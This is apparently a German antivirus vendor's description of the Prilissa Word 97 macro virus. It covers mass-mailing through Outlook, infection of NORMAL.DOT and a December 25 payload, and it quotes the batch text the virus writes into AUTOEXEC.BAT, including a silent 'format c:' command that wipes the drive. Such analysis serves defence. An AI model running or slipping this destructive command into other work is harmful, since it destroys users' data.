Infizierung:
Prilissa infiziert Word 97-Dateien und verbreitet sich über Outlook. Er verschickt sich selbst in einer Email mit dem Betreff „Message from “ und dem Text „This document is very important and you’ve GOT to read this!!!“. Diese Email wird einmalig bei einer Infizierung automatisch an die ersten 50 (!!) Einträge in Ihrem Adreßbuch weitergeschickt.

Schadensroutine:
Nach der Absendung der 50 Emails infiziert der Virus die NORMAL.DOT, so daß jedes neu geöffnete oder gespeicherte Word-Dokument infiziert wird. Am 25. Dezember tritt die eigentliche Schadensroutine in Kraft. Prilissa überschreibt die AUTOEXEC.BAT mit Text und einem Formatierungsbefehl für das Laufwerk C:

@echo off
@echo Vine...Vide...Vice...Moslem Power Never End...
@echo Your Computer Have Just Been Terminated By -= CyberNET =- ‘Virus !!!
ctty nul
format c: /autotest /q /u

Beim nächsten Neustart wird die Festplatte dann gelöscht. Windows NT-PCs sind hierbei nicht betroffen (diese haben keine AUTOEXEC.BAT). Desweiteren erscheint ebenfalls am 25. Dezember in Word 97 die Meldung "(C) 1999 - CyberNET Vine... Vide... Vice... Moslem Power Never End... You Dare Rise Against Me... The Human Era is Over, The CyberNET Era Has Come!!! [OK]". Nach einem Klick auf [OK] erscheinen einige Figuren in verschiedenen Farben und Formen im geöffneten Worddokument und es wird ein neuer Registrierungseintrag in „HKEY_CURRENT_USER\Software\Microsoft\Office\” namens „CyberNET“ erzeugt. Dieser erhält den Wert „(C)1999 - Indonesia by AnomOke!“. Dieser Eintrag stellt sicher, daß die Emails an die 50 ersten Outlookadressen nur einmal versendet werden.

Bemerkungen:
Das Auslösedatum, der in Word 97 angezeigte Text und ein Registrierungseintrag deuten darauf hin, daß der Virenautor ein sehr religiöser Indonesier ist.

Zurück

Zur Virenübersicht

Virusbeschreibung per Email senden

Virusbeschreibung ausdrucken